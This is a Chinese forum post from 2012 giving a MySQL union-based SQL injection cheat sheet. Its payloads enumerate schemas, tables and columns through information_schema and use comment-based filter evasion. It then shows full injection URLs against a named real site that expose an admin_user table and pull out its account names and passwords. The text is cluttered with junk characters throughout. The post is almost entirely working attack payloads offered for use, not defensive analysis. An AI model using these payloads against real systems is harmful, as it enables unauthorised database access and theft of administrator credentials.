查库
+ \; J6 Z# T8 d
/ P, t2 m$ ]( V( kid=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*3 V0 z$ c3 ]1 n$ b; Q# P
3 v9 a1 {; v, \4 j7 o* x$ s查表
$ O0 x" P! p0 |6 B
: e$ J# z. B7 S+ K; iid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
& z$ i( t4 i6 C2 N3 Y3 P
+ x5 I6 i1 k3 l查段
) r& |0 v( F" f8 K: s' L# N* H0 q' }. i; x' Y' H- n. J( v2 [7 l2 n
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
( t, S/ j2 `! b
4 N! b* ^8 p- d! D& t' Y
/ U; @0 N2 G5 o( r# @mysql5高级注入方法暴表* l# z6 X; o5 G' n2 W1 [ j/ S4 Z
7 {# L" k. V0 G+ c1 @
例子如下:
: u! n [ z! y- P
% H9 M# t* K6 e: M( o( v1.爆表" L. Z; r @- s% m
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet) j6 O2 t9 J* q1 H% a# n
这样爆到第4个时出现了admin_user表。: \5 ]) D1 U5 X
* ^% V/ K3 I0 B" ^9 S* q1 a5 C
2.暴字段
; M8 ^" v8 n' ?& ?* e. C! \- Xhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
3 T7 ^4 b9 r0 }8 N1 r& E' ?' Q# G' m; M6 Q, y! P! ?
# d( R* h! C! i9 ~9 s4 M3.爆密码* f" i3 ^- t. a$ k7 H9 o1 ]$ H& f
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* # B4 L; f# z9 ~) |
5 d4 `3 t$ s7 x! B4 h1 u* {9 L0 Y Z3 N
|
发表于 2012-9-13 16:29:37
收藏
支持
反对